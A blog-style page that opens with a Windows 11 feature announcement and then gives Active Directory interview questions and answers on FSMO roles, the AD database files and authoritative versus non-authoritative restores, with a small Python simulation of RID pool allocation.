Windows 11 unlocks the full potential of your system’s hardware, putting some of the latest #gaming technology to work for you. Like: DirectX 12 Ultimate, which can enable breathtaking, immersive graphics at high frame rates; DirectStorage for faster load times and more detailed game worlds; and Auto HDR for a wider, more vivid range of colors for a truly captivating visual experience.



Also Windows 11 will be bringing #Android apps to Windows for the first time. Starting later this year, people will be able to discover Android apps in the Microsoft Store and download them through the #Amazon Appstore – imagine recording and posting a video or using Khan Academy Kids for virtual learning right from your PC.



Windows 11 will be available as a free upgrade for eligible Windows 10 PCs. To check whether your current Windows 10 PC is eligible for the free upgrade to Windows 11, visit Windows.com to download the PC Health Check app.


Here is the official release details  Link https://blogs.windows.com/windowsexperience/2021/06/24/introducing-windows-11/


AD Active Directory Interview Questions and Answers

What is Active Directory?

Active Directory (AD) is a directory service developed by Microsoft that stores objects such as users, computers, printers and network information, and authenticates users and computers in a Windows domain. It makes a network easier to manage: multiple Domain Controllers in different locations each hold a copy of the AD database, a change made on any Domain Controller is replicated to all the others, and administration is centralized across geographical locations.

What is LDAP and how the LDAP been used on Active Directory(AD)?

What is Tree?
A tree is a hierarchical arrangement of Windows domains that share a contiguous namespace (for example corp.example.com and sales.corp.example.com).

What is Domain?
A domain is a security and administrative boundary within Active Directory Domain Services (AD DS), Microsoft's directory server. It provides authentication and authorization for the objects in it, as well as a framework within which other related services can be deployed.

What is Active Directory Domain Controller (DC)?
A Domain Controller is the server that holds the AD database and services authentication requests. All AD changes made on one DC are replicated to the other DCs, and vice versa.

What is Forest?
A forest consists of one or more domain trees. The domain trees in a forest do not form a contiguous namespace, but they share a common schema and a global catalog (GC), and the forest is the security boundary of AD.

What is Schema?
The Active Directory schema is the set of definitions that specify the kinds of object, and the types of information about those objects, that can be stored in Active Directory.
In other words, the schema is the collection of object classes and their attributes:
Object Class = User
Attributes = first name, last name, email, and others

Can we restore a schema partition?


Tell me about the FSMO roles?
Schema Master
Domain Naming Master
Infrastructure Master
RID Master
PDC
Schema Master and Domain Naming Master are forest-wide roles; there is only one of each per forest. The other roles are domain-wide, with one of each per domain.
AD replication is multi-master: a change can be made on any Domain Controller and is replicated to the other Domain Controllers. The exceptions are the five roles above, the Flexible Single Master Operations (FSMO) roles: the changes they govern can only be made on the Domain Controller that holds the role, so for those operations replication is single-master.

How to check which server holds which role?
Netdom query FSMO

Which FSMO role is the most important? And why?
An interesting question: which of the 5 FSMO roles is the most important, i.e. which one's failure affects end users immediately?
Most inexperienced administrators pick the Schema Master, perhaps because the schema sounds critical to running Active Directory.
The correct answer is the PDC Emulator. To see why, here is what happens, role by role, when the FSMO role holder fails.

Schema Master – The Schema Master is needed to update the schema. We don't update the schema daily; it is changed during events such as an operating system migration, installing a new Exchange version, or installing any other application that extends the schema.
So if the Schema Master server is not available we cannot update the schema, but this does not affect normal Active Directory operation or the end user.
The Schema Master only needs to be online when a schema change is planned, so there is time to bring the server back.

Domain Naming Master – The Domain Naming Master is required to create a new domain or an application partition. As with the Schema Master, we don't create domains or application partitions frequently.
So if the Domain Naming Master server is not available we cannot create a new domain or application partition, but users are not affected and will not even notice that it is down.

Infrastructure Master – The Infrastructure Master maintains cross-domain object references in its domain, for example a group whose members are users from another domain in the forest. Because a DC only holds full objects from its own domain, such members are stored as references, and the Infrastructure Master keeps them up to date (when the referenced object is renamed or moved, for example) by comparing them against the Global Catalog, every 2 days by default. That is why the Infrastructure Master should not be placed on a GC server unless every DC in the domain is a GC: a GC already holds the referenced objects, so the Infrastructure Master would never detect stale references.
In a single-domain, single-forest environment there is no impact if the Infrastructure Master server is down.
In a multi-domain environment there will be an impact, but there is enough time to fix the issue before end users are affected.

RID Master – Every DC is initially issued a pool of 500 RIDs by the RID Master. RIDs are used to create new objects in Active Directory: every new security principal gets a Security ID (SID), and the RID is the last part of the SID. The RID uniquely identifies the security principal relative to the local or domain security authority that issued the SID.
When a DC's pool drops to 250 (50%), it requests a second pool of RIDs from the RID Master. If the RID Master server is not available, no new pools can be issued, and each DC can keep creating objects only as long as its remaining RIDs last. Since every DC has somewhere between 250 and 750 RIDs available at any time, there is no immediate impact.
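The RID mechanics described above, as an added example that is not part of the original page: a SID parser that pulls the RID out of a textual SID, plus a small simulation of a RID Master handing out 500-RID pools and a DC that requests its standby pool at the 50% mark and only fails once both the current pool is exhausted and the master is unreachable. The starting RID, the domain SID and the well-known RID table are assumptions for the example.

```python
import re

# A few well-known RIDs; the rest of the SID identifies the issuing domain or authority.
WELL_KNOWN_RIDS = {500: "Administrator", 501: "Guest", 502: "krbtgt",
                   512: "Domain Admins", 513: "Domain Users", 519: "Enterprise Admins"}

_SID_RE = re.compile(r"^S-1-(\d+)((?:-\d+)+)$")


def parse_sid(sid: str):
    """Split 'S-1-<authority>-<sub-authorities>-<RID>' into (authority, sub-authorities, RID)."""
    m = _SID_RE.match(sid)
    if not m:
        raise ValueError(f"not a SID: {sid!r}")
    authority = int(m.group(1))
    subs = [int(x) for x in m.group(2).lstrip("-").split("-")]
    return authority, subs[:-1], subs[-1]      # the RID is always the last value


def describe_rid(sid: str) -> str:
    rid = parse_sid(sid)[2]
    return WELL_KNOWN_RIDS.get(rid, "ordinary (pool-allocated) RID")


class RidMaster:
    """The one DC per domain that hands out blocks of RIDs."""

    def __init__(self, next_rid: int = 1000):     # assumed first free RID for the example
        self.next_rid = next_rid
        self.online = True

    def allocate_pool(self, size: int):
        if not self.online:
            return None                          # the request simply fails while it is down
        start = self.next_rid
        self.next_rid += size
        return (start, start + size - 1)


class DomainController:
    """A DC draws RIDs from its local pool and asks for a new pool once half of it is used."""

    def __init__(self, name: str, master: RidMaster, pool_size: int = 500):
        self.name, self.master, self.pool_size = name, master, pool_size
        self.pool = master.allocate_pool(pool_size)    # (first, last) RIDs still unused
        self.standby = None

    def remaining(self) -> int:
        return 0 if self.pool is None else self.pool[1] - self.pool[0] + 1

    def create_object(self, domain_sid: str) -> str:
        if self.pool is None:
            raise RuntimeError(f"{self.name}: RID pool exhausted and RID master unavailable")
        first, last = self.pool
        rid = first
        self.pool = (first + 1, last) if first < last else None
        # At 50% used, request the next block; retried on every create if the master was down.
        if self.standby is None and self.remaining() <= self.pool_size // 2:
            self.standby = self.master.allocate_pool(self.pool_size)
        if self.pool is None and self.standby is not None:
            self.pool, self.standby = self.standby, None
        return f"{domain_sid}-{rid}"
```

This is why the RID Master can be down for a while without anyone noticing, and also why it must never be restored from an old backup: a restored master would hand out pools it has already issued, and two objects would end up with the same SID.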

PDC – The PDC Emulator is required for time synchronization, user logon, password changes and trusts. Now you know why the PDC Emulator is the most important FSMO role holder to get back online: its failure affects end users immediately, and it must be recovered ASAP.
The PDC Emulator stands in as the Primary Domain Controller for backwards compatibility. It is the authoritative time source within the domain and the password master: any password change is replicated to the PDC Emulator immediately, and if a logon request fails because of a bad password, the request is forwarded to the PDC Emulator to re-check the password before the logon is rejected.

Tell me about the Active Directory database and list the Active Directory database files?
ntds.dit
edb.log
edb.chk
res1.log and res2.log
AD changes are not written directly to the ntds.dit database file: they are first written to edb.log and then from the log file into the database. edb.chk tracks which log entries have already been applied to the database file.
ntds.dit: ntds.dit is the AD database and stores all AD objects. The default location is %SystemRoot%\NTDS\ntds.dit. The Active Directory database engine is the Extensible Storage Engine (ESE), which is based on the Jet database.
edb.log: edb.log is the current transaction log file. When it is full it is renamed with an increasing sequence number (edb00001.log and so on) and a fresh edb.log is started.
edb.chk: edb.chk is the checkpoint file used to track the data not yet written to the database file. It marks the starting point from which data must be replayed from the log files in case of a failure.
res1.log and res2.log: these are reserved transaction log files; they hold disk space in reserve so that the directory service has enough room to shut down cleanly if the disk runs out of space.

Active Directory restore types?
Authoritative restore
Non-authoritative restore

Non-authoritative restore of Active Directory
A non-authoritative restore returns the domain controller to its state at the time of the backup and then allows normal replication to overwrite the restored domain controller with any changes that have occurred since. After the system state restore, the domain controller queries its replication partners and receives the changes made after the backup date, so that it ends up with an accurate and up-to-date copy of the Active Directory database.
Non-authoritative restore is the default method for restoring Active Directory: a plain restore of the system state is a non-authoritative restore. It is mostly used when a single DC has suffered data loss or corruption.

How do you perform a non-authoritative restore?
Start the domain controller in Directory Services Restore Mode (DSRM) and perform a system state restore from backup.

Authoritative restore of Active Directory
An authoritative restore is the next step after a non-authoritative restore; you have to do a non-authoritative restore before you can perform an authoritative one. The main difference is that an authoritative restore increments the version number of the attributes of all objects, or of an individual object or subtree, in the directory, which makes the restored copy of those objects authoritative. This can be used to bring back a single deleted user or group, or even an entire OU.
In a non-authoritative restore, after the domain controller is back online it contacts its replication partners to determine the changes since the time of the last backup and takes them. In an authoritative restore, however, the version numbers of the object attributes you marked as authoritative are higher than the existing version numbers of those attributes on the other DCs, so the objects on the restored domain controller appear to be more recent and are replicated out to the other domain controllers in the domain.

How do you perform an authoritative restore?
Unlike a non-authoritative restore, an authoritative restore needs Ntdsutil.exe to increment the version numbers of the object attributes: boot into DSRM, restore the system state, then use ntdsutil's "authoritative restore" command to mark the object or subtree before restarting normally.

Which Active Directory partitions can be restored authoritatively?
You can authoritatively restore only objects from the configuration and domain partitions. Authoritative restores of the schema naming context are not supported.

How many domain controllers need to be backed up, and which ones?
The minimum requirement is to back up two domain controllers in each domain, one of which should be an operations master role holder. There is no need to back up the RID Master specifically, because the RID Master should not be restored (restoring it from an old backup could reissue RID pools that were already handed out, producing duplicate SIDs).
